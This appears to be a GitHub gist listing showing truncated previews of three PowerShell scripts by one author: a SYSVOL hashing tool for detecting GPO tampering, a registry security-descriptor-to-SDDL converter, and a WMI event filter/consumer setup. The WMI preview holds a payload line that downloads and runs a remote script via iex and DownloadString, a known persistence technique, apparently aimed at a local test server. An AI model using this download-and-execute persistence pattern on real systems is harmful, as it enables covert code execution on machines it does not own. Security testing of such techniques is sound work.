olamotte
olamotte
/ GPO-inspector.ps1
Created
August 1, 2020 13:53
Crawl and hash SYSVOL on all DCs and ship to Splunk HEC
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # GPO-inspector is a script to run on a regular basis to crawl all the different domain controllers of the current domain, looking for replication issues or tampering. | |
| # If you pass the Switch "Debug", the script will pick a single random DC and only process 3 files | |
| # | |
| # 2019-02-12 - Version 0.1 | |
| # author olamotte | |
| # | |
| param ( | |
| [switch] $Debug = $false | |
| ) |
olamotte
/ Binary SD to human readable DACL
Created
January 12, 2020 16:45
Windows Registry conversion from binary Security Descriptor to SDDL DACL
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Example: Which users can access the SMB Session information on a Windows 10 computer (NetCease status) | |
| #Retrieve the binary value | |
| $acl=Get-ItemProperty -Path Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\DefaultSecurity -Name SrvsvcSessionInfo | |
| #Use WMI helper to obtain a converter | |
| $converter = new-object system.management.ManagementClass Win32_SecurityDescriptorHelper | |
| #Do the conversion to SDDL | |
| $outsddl = $converter.BinarySDToSDDL($acl.SrvsvcSessionInfo) |
olamotte
/ WMI_trigger.ps1
Created
September 4, 2019 12:52
WMI filter, consumer, and binding creation in powershell
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $EventFilterName = "test_ps_filter2" | |
| $EventConsumerName = "test_ps_consumer2" | |
| $Payload = "cmd /C powershell.exe -nop iex(New-Object Net.WebClient).DownloadString('http://localhost:8000/pop.txt');" | |
| #Event filter | |
| $EventFilterArgs = @{ | |
| EventNamespace = 'root/cimv2' | |
| Name = $EventFilterName | |
| Query = "SELECT * FROM __InstanceCreationEvent WITHIN 5 WHERE TargetInstance ISA 'Win32_Process' AND TargetInstance.Name = 'trigger.exe'"; |